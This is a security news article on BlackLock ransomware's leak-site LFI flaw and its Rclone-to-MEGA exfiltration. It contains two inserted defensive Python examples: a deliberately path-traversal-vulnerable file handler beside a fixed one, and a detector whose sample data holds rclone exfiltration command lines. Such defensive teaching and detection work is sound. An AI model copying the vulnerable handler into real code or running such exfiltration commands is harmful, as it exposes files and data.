
Mar 29, 2025 | Ravie Lakshmanan | Cybercrime / Vulnerability

In a remarkable incident of hackers being hacked, threat hunters have successfully infiltrated the online infrastructure of the BlackLock ransomware group, exposing crucial information about their operational methods.

According to Resecurity, a security vulnerability in the data leak site (DLS) operated by the cybercrime group allowed the extraction of configuration files, credentials, and command execution history from the server.

Resecurity attributes the flaw to a misconfiguration in the BlackLock DLS that disclosed clearnet IP addresses of the infrastructure hosted behind the group's Tor hidden services, along with other service details, the company said in a report.

The obtained command execution history is considered one of the most significant operational security (OPSEC) failures of the BlackLock ransomware group.

BlackLock is a rebranded version of the Eldorado ransomware group and has become one of the most active extortion syndicates in 2025, primarily targeting the technology, manufacturing, construction, finance, and retail sectors. As of last month, they have listed 46 victims on their site.

The affected organizations are located in various countries, including Argentina, Aruba, Brazil, Canada, Congo, Croatia, Peru, France, Italy, the Netherlands, Spain, the United Arab Emirates, the United Kingdom, and the United States.

The group, which launched an underground affiliate network in mid-January 2025, has been observed recruiting traffers, actors who drive victims to malicious pages that deploy initial-access malware, to facilitate the early stages of attacks on compromised systems.

The vulnerability Resecurity identified is a local file inclusion (LFI) bug: by supplying a path traversal sequence in a request, an attacker can make the web server read and return files outside the directory it is meant to serve, which is how sensitive material such as the command execution history was obtained.
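As an added illustration of the bug class described above (this is not code from the article, from Resecurity, or from the BlackLock site, whose software stack the report does not describe), the following shows a minimal file-serving handler written the vulnerable way beside a hardened version. The directory layout, the `.bash_history` file and the request strings are constructed for the demo.

```python
import os
import tempfile


def build_sandbox():
    """Create a throwaway directory tree standing in for a web host.

    Constructed sample data for this demo, not anything recovered from a real site.
    Layout:  <root>/www/index.html   (inside the web root)
             <root>/.bash_history    (outside it; must never be served)
    """
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "www")
    os.makedirs(webroot)
    with open(os.path.join(webroot, "index.html"), "w") as fh:
        fh.write("<h1>leak site</h1>")
    with open(os.path.join(root, ".bash_history"), "w") as fh:
        fh.write("ls -la\n")
    return root, webroot


def serve_vulnerable(webroot, requested):
    """LFI pattern: user input is joined onto the web root and opened as-is.

    '../' sequences walk out of the web root, and an absolute path makes
    os.path.join discard the web root entirely.
    """
    with open(os.path.join(webroot, requested)) as fh:
        return fh.read()


def is_within(webroot, requested):
    """True only if the resolved target stays under the resolved web root.

    realpath() collapses '..' and follows symlinks on both sides; commonpath()
    avoids the classic prefix bug where '/var/www2' would pass a startswith
    check against '/var/www'.
    """
    base = os.path.realpath(webroot)
    target = os.path.realpath(os.path.join(base, requested))
    return os.path.commonpath([base, target]) == base


def serve_hardened(webroot, requested):
    """Same handler with the containment check applied before the open."""
    if not is_within(webroot, requested):
        raise PermissionError(f"refusing path outside web root: {requested!r}")
    with open(os.path.join(os.path.realpath(webroot), requested)) as fh:
        return fh.read()


def run_demo():
    """Exercise both handlers against the sandbox and return what each did."""
    _root, webroot = build_sandbox()
    leaked = serve_vulnerable(webroot, "../.bash_history")
    try:
        serve_hardened(webroot, "../.bash_history")
        blocked = False
    except PermissionError:
        blocked = True
    return {
        "vulnerable_leak": leaked,      # the history file, read from outside the web root
        "hardened_blocked": blocked,    # True: the traversal was refused
        "hardened_ok": serve_hardened(webroot, "index.html"),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value!r}")
```

The containment check is done on the resolved path rather than on the raw string, so URL-decoded `..` sequences, absolute paths and symlinks inside the web root are all caught by the same comparison; rejecting `..` substrings alone is the usual incomplete fix.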

Some notable findings from the investigation are:

  • The use of Rclone to exfiltrate data to the MEGA cloud storage service, in some cases even installing the MEGA client directly on victim systems.
  • The creation of at least eight accounts on MEGA using disposable email addresses created via YOPmail to store victim data.
  • Reverse engineering of the ransomware uncovered source code and ransom note similarities with another strain codenamed DragonForce, which has targeted organizations in Saudi Arabia.
  • “$$$”, one of the main operators of BlackLock, launched a short-lived ransomware project called Mamona on March 11, 2025.
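The Rclone-to-MEGA exfiltration pattern in the first two findings is something defenders can hunt for. The following is an added example, not code from the article or from Resecurity, of two simple checks: one classifies process-creation events by rclone's command-line shape (a transfer verb plus a `remote:path` argument, which survives renaming of the binary) and by the MEGA desktop client's binary name, and one parses an `rclone.conf` for remotes of type `mega`. The event records, file paths, remote names and the config file are constructed for the demo, and the MEGA binary name list is an assumption to be tuned to your environment.

```python
import configparser
import re
import shlex

# Constructed Sysmon-style process-creation events; not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"image": r"C:\Users\svc\AppData\Local\Temp\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Finance\Share mega:acme-2025 --transfers 16 -P"},
    # renamed rclone binary pointed at its own config file (constructed)
    {"image": r"C:\ProgramData\update.exe",
     "cmdline": r"update.exe sync D:\HR\ remote1:hr --config C:\ProgramData\r.conf -q"},
    {"image": r"C:\Users\svc\AppData\Local\MEGAsync\MEGAsync.exe",
     "cmdline": r"C:\Users\svc\AppData\Local\MEGAsync\MEGAsync.exe"},
    {"image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a C:\Temp\out.7z C:\Finance"},
]

# Constructed rclone.conf in rclone's real INI layout; the credentials are fake.
SAMPLE_RCLONE_CONF = """\
[backup]
type = mega
user = throwaway123@yopmail.com
pass = not-a-real-obscured-password

[drive]
type = local
"""

RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone remote syntax: 'name:path' with no backslashes. Requiring at least two
# characters before the colon keeps Windows drive paths such as C:\x from matching.
REMOTE_RE = re.compile(r"^[A-Za-z0-9_-]{2,}:[^\\\s]*$")
# Assumed MEGA client binary names; adjust for what your environment actually sees.
MEGA_CLIENT_IMAGES = {"megasync.exe"}


def classify_event(event):
    """Return the list of reasons this process event looks like rclone/MEGA exfil."""
    reasons = []
    image = event["image"].rsplit("\\", 1)[-1].lower()
    try:
        argv = shlex.split(event["cmdline"], posix=False)   # keep Windows backslashes
    except ValueError:
        argv = event["cmdline"].split()
    args = [a.lower() for a in argv[1:]]

    if image == "rclone.exe":
        reasons.append("rclone binary")
    if image in MEGA_CLIENT_IMAGES:
        reasons.append("MEGA client binary")
    remotes = [a for a in argv[1:] if REMOTE_RE.match(a)]
    if set(args) & RCLONE_VERBS and remotes:
        reasons.append(f"rclone-style transfer to remote {remotes[0]}")
    if "--config" in args:
        reasons.append("explicit rclone config path")
    return reasons


def scan(events=SAMPLE_EVENTS):
    """Map each event's image basename to its detection reasons."""
    return {e["image"].rsplit("\\", 1)[-1]: classify_event(e) for e in events}


def find_cloud_remotes(conf_text, suspicious_types=("mega",)):
    """List (remote name, type) pairs in an rclone.conf whose backend type is watched."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return [(name, cp[name]["type"]) for name in cp.sections()
            if cp[name].get("type", "").lower() in suspicious_types]


if __name__ == "__main__":
    for image, reasons in scan().items():
        print(f"{image:14} {reasons}")
    print(find_cloud_remotes(SAMPLE_RCLONE_CONF))
```

Matching on the command-line shape rather than the file name is what makes the second rule useful: renaming `rclone.exe` is trivial for an affiliate, but the `remote:path` argument and transfer verb are how the tool is driven.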

In a surprising turn of events, BlackLock’s DLS was defaced by DragonForce on March 20, likely by exploiting the same LFI vulnerability, with configuration files and internal chats leaked on its landing page.

Resecurity noted that it is unclear if BlackLock Ransomware started cooperating with DragonForce or silently transitioned under new ownership, suggesting that the new masters may have taken over the project and its affiliate base due to ransomware market consolidation.

The key actor ‘$$$’ did not express surprise after the incidents with BlackLock and Mamona Ransomware, leading to speculation that the actor may have been aware of the potential compromise and chose to exit the project silently.
